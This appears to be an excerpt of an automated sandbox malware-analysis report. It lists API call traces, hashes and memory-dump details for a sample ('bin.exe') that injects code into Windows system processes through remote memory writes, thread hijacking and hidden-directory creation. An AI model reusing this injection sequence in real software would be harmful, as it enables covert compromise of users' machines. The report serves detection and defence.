Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 02F03AB6514504BFFB017BB09C89A7F3A9CEE40301B840535BC4EDA4DADD349C148975

Analysis Process: svchost.exePID: 3396, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	2

Executed Functions

Function 00F00908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00F0096B
RtlExitUserThread.NTDLL ref: 00F00974

Memory Dump Source

Source File: 00000006.00000002.3338632608.0000000000F00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f00000_svchost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 32dd2379993f4d7dbdbd3460659afc81d6333259d3364958f7270641f1aa1eeb
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 17F082B2514504AFFB017BB09C89D7F769CEF40311B840535FC4ADA0DADD389C14A975

Analysis Process: svchost.exePID: 3448, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	63
Total number of Limit Nodes:	3

Executed Functions

Function 00190908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0019096B
RtlExitUserThread.NTDLL ref: 00190974

Memory Dump Source

Source File: 00000007.00000002.3338779768.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_190000_svchost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 25c5932651a0dac57c4aac90e5e38a2da7e0603123c5d8d5a8e2391e0421f779
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 45F05EB2514504BFFF02BBB08C8987B369CEF643157450535FC4ADA09ADE348C548575

Analysis Process: ctfmon.exePID: 3676, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	79
Total number of Limit Nodes:	3

Executed Functions

Function 009E1DA4 Relevance: 4.6, APIs: 3, Instructions: 123
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 009E1DE3
VirtualAlloc.KERNELBASE ref: 009E1E1C
VirtualProtect.KERNELBASE ref: 009E1EA0

Memory Dump Source

Source File: 00000008.00000002.3337354184.00000000009E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9e0000_ctfmon.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction ID: 44ff9588ec6bfd507583edcc13ee5f1081a6d0af34ed7737366f38eee3e892cb
Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction Fuzzy Hash: 09212D30A34C1D0BEB58627D9859764F6D6E79C720F9803A9E90ED36D8ED68CC8187C5

Function 009E0908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 009E096B
RtlExitUserThread.NTDLL ref: 009E0974

Memory Dump Source

Source File: 00000008.00000002.3337354184.00000000009E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9e0000_ctfmon.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: e850eb3260708d28ad91721ec924aa1a30e2dc2ae1e3c3e827f944467aa568a1
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 78F05EB2514684AFFB027FB18C8AA7B369CEEC03017440935FC46DA09ADD748C948675

Analysis Process: svchost.exePID: 3356, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	2

Executed Functions

Function 00840908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0084096B
RtlExitUserThread.NTDLL ref: 00840974

Memory Dump Source

Source File: 00000009.00000002.3337345086.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_840000_svchost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 69245d1bdd8f7653f51bb1844b39e882d43f934672df0e9b5c731ff2a13993f7
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 52F05EB6914608AFFF007BB89C8997B3A9CFE403017440535FD46DA09AED348C548976

Analysis Process: StartMenuExperienceHost.exePID: 4652, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	2

Executed Functions

Function 00EE0908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00EE096B
RtlExitUserThread.NTDLL ref: 00EE0974

Memory Dump Source

Source File: 0000000A.00000002.3339301421.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ee0000_StartMenuExperienceHost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 508759bea98720db023dd0e0fc758f425541f33595a2d57816ce7396e964a645
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 20F05EB2514588AFFB017FB18C8A87B36DCEE803017441976FC46EA09ADD758C948675

Analysis Process: RuntimeBroker.exePID: 4840, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	2

Executed Functions

Function 00A40908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 00A4096B
RtlExitUserThread.NTDLL ref: 00A40974

Memory Dump Source

Source File: 0000000B.00000002.3337604081.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_RuntimeBroker.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 8c2e81e94c14ba8e344e11a3a8701249c86f4e0d74b3beeb93e978d1080a7375
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: A0F05EBA914504AFFB007BB09D8AC7B369CEE803017440535FD46DA09ADE348C548975

Analysis Process: dllhost.exePID: 424, Parent PID: 752COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	63
Total number of Limit Nodes:	3

Executed Functions

Function 005F0908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 005F096B
RtlExitUserThread.NTDLL ref: 005F0974

Memory Dump Source

Source File: 0000000F.00000002.3337862709.00000000005F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5f0000_dllhost.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 2490ec10bc82a4dcd380210c0a096dc508ed29f265749e4b3b2212abb351009a
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: D0F03AB251490DAFFB007BB08C8D87B7A9CFE803017481925BE46DA09BED389C148A79

Analysis Process: RuntimeBroker.exePID: 4300, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	63
Total number of Limit Nodes:	3

Executed Functions

Function 00530908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0053096B
RtlExitUserThread.NTDLL ref: 00530974

Memory Dump Source

Source File: 00000010.00000002.3338936365.0000000000530000.00000040.00000001.00020000.00000000.sdmp, Offset: 00530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_530000_RuntimeBroker.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: 62b1bcab464dd3cfca7a072dbdfa0fab3f0c9a3dd9cdaf5e3ceb70a3c9b18f5a
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 8BF05EB2514A09AFFB007BB08C9D97B3B9CFE80301B441935FC46DA0DADD358C148A79

Analysis Process: RuntimeBroker.exePID: 5524, Parent PID: 616COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	2

Executed Functions

Function 00820908 Relevance: 3.0, APIs: 2, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0082096B
RtlExitUserThread.NTDLL ref: 00820974

Memory Dump Source

Source File: 00000011.00000002.3339661175.0000000000820000.00000040.00000001.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_820000_RuntimeBroker.jbxd

Similarity

API ID: ExitSleepThreadUser
String ID:
API String ID: 3375650085-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: f15670f4127766d05280988ba789b204f416b2049cda367683d08d106eb4f630
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 2EF05EB6514524BFFF007BB8AC8987B369CFE503017540535FC46DA09BDD348C948976

Analysis Process: smartscreen.exePID: 5568, Parent PID: 616COMMON

Executed Functions

Function 00251DA4 Relevance: 4.6, APIs: 3, Instructions: 123
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00251DE3
VirtualAlloc.KERNELBASE ref: 00251E1C
VirtualProtect.KERNELBASE ref: 00251EA0

Memory Dump Source

Source File: 00000012.00000002.2434430030.0000000000250000.00000040.00000001.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_250000_smartscreen.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction ID: 6e0df8d9f998a8712087ea6067a65867bf4beec65ed23bfde698a22f879cf213
Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
Instruction Fuzzy Hash: BE214030A34C1E0BEB18667C8859764F6D2E79C321F580355ED0DD36D8ED68CC9187C5

Function 00250908 Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0025096B

Memory Dump Source

Source File: 00000012.00000002.2434430030.0000000000250000.00000040.00000001.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_250000_smartscreen.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction ID: a145c58afc3974f5706ef822a683dfbe68aba336ccf0c723b2b28b8f7f590290
Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
Instruction Fuzzy Hash: 60F05EB2524504AFFB007BB08CCAD7B76ACEE403027840935FC46DA09AED349C388979

Analysis Process: bin.exePID: 7064, Parent PID: 4004COMMON

Executed Functions

Function 001C0E21 Relevance: 6.1, APIs: 4, Instructions: 57
injectionmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
CreateRemoteThread.KERNELBASE(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C0EB1

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction ID: 9e1f878eac78179e63507154ab3e59f021aece4aaf68afa768676749f8b9bd9e
Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction Fuzzy Hash: 6A119A32240204FBFF215F21CC85FAA3B69EF84B54F188014FE48BE595D770E560CAA8

Function 022505BC Relevance: 6.1, APIs: 4, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,00000008,00000000), ref: 022505DA
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000008,00000000), ref: 022505FB
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0225062B
NtWriteVirtualMemory.NTDLL(?,?,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0225064D

Part of subcall function 02250655: NtWriteVirtualMemory.NTDLL(?,?,02250F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0225066F

Memory Dump Source

Source File: 00000013.00000002.2495993363.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2250000_bin.jbxd

Similarity

API ID: Memory$VirtualWrite$ProcessRead
String ID:
API String ID: 2369493071-0
Opcode ID: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
Instruction ID: 972858e1fb8156d71226566be3cc3df0139082a55436f80db0b199c8b59938c8
Opcode Fuzzy Hash: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
Instruction Fuzzy Hash: 2C111BB0390745BBE7209F45CCC4F96B766FF0C300F548124AB085A292CB70B9A4DB99

Function 001C15E4 Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001C160C

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
Instruction ID: f89654c994a3303b23e412f08d7b43ad8504f33b7d29e365df13ca103ac73e30
Opcode Fuzzy Hash: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
Instruction Fuzzy Hash: F2F05436100109EFCF068F90DA94C9A3B32FF5D358B048159FE1A2A2A0C772A970EB58

Function 02250655 Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,02250F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0225066F

Memory Dump Source

Source File: 00000013.00000002.2495993363.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2250000_bin.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
Instruction ID: e77c15a4de2ec8ee16c58a309ca8558447daf3d4da7b220977cb32847672f043
Opcode Fuzzy Hash: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
Instruction Fuzzy Hash: 5DF0AE74254611AFD328DF84C984B64B7A2FF58310F158499E9898B3A1CB30AA40CB45

Function 001C16C0 Relevance: 1.5, APIs: 1, Instructions: 17
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 001C16FD

Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Process$AllocMemoryResumeThreadVirtualWow64Write
String ID:
API String ID: 308677811-0
Opcode ID: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
Instruction ID: 50c68c5dfab682ea1a1f8b0f0c987396ec09a66bf25883eb63b730f6d608dfef
Opcode Fuzzy Hash: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
Instruction Fuzzy Hash: 12E09A75100104BAEF029F54C999F4A3B70AB25358F044455EC09AE1C6C3F59524CB6C

Function 001C097F Relevance: 18.1, APIs: 12, Instructions: 120
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 001C099A
RtlExitUserThread.NTDLL(00000000), ref: 001C09A2
OpenMutexA.KERNEL32(001F0001,00000000), ref: 001C09C2
GetStartupInfoA.KERNEL32(00000000), ref: 001C09DA

Part of subcall function 001C0A1A: CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
Part of subcall function 001C0A1A: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
Part of subcall function 001C0A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
Part of subcall function 001C0A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
Part of subcall function 001C0A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
Part of subcall function 001C0A1A: ResumeThread.KERNEL32(?), ref: 001C0AF7
Part of subcall function 001C0A1A: Sleep.KERNEL32(000003E8), ref: 001C0B07
Part of subcall function 001C0A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
String ID:
API String ID: 1099281029-0
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 482e49ecec93f6808493f0189dbbc3643221c1c1eb3ea815b0c0a648cf82ffd9
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 84413071640214AFEF129F60CC85FA977ACEF54B44F040199BB49FE0D6DB709A90CA65

Function 001C3FDE Relevance: 6.0, APIs: 4, Instructions: 26
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C3FFE
Sleep.KERNELBASE(000003E8,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C4020
Sleep.KERNELBASE(000007D0), ref: 001C4030
Sleep.KERNELBASE(00000BB8), ref: 001C4040

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: 90a0306340f54f8a0a8555a1ee633c2a62b65fb2f3a667207fde47de25335585
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: A1F01C7058C280D7EB507BA08C9AF8D36A89F31709F041098BB49AE496CF78C560DE72

Function 001C1386 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: aee6498fc1534bf5843544c719c366106a18b629b188e7960a7d370974955569
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 5521CD31940256AFDB12DF78C848FACBBB5AF15710F458229F955AF2D1E730E810CB94

Function 001C1528 Relevance: 1.6, APIs: 1, Instructions: 51
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001C1522,00000006,?,00000000), ref: 001C152D

Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA

Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
Part of subcall function 001C1386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: Virtual$Protect$AddressAllocLibraryLoadProc
String ID:
API String ID: 2821516111-0
Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction ID: 84603d99140c77a5ab07f23fff341f14d22a0cbe777f466f71f0401ea30cd6a0
Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction Fuzzy Hash: 6511C1B2404614AEEF03AF20C5C4DAA73ECFE51708B450A6EAD85EF44EEF709154CAE5

Non-executed Functions

Function 001C0688 Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001C067F,00000009,?,00000000), ref: 001C068D

Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA

Part of subcall function 001C06CE: lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
Part of subcall function 001C06CE: lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C070A
Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
Part of subcall function 001C06CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
Part of subcall function 001C06CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C081D

Memory Dump Source

Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction ID: 6916e961ec7af8ef0e99d5548a14004a71d42b8846935f748d6844fc744d3216
Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
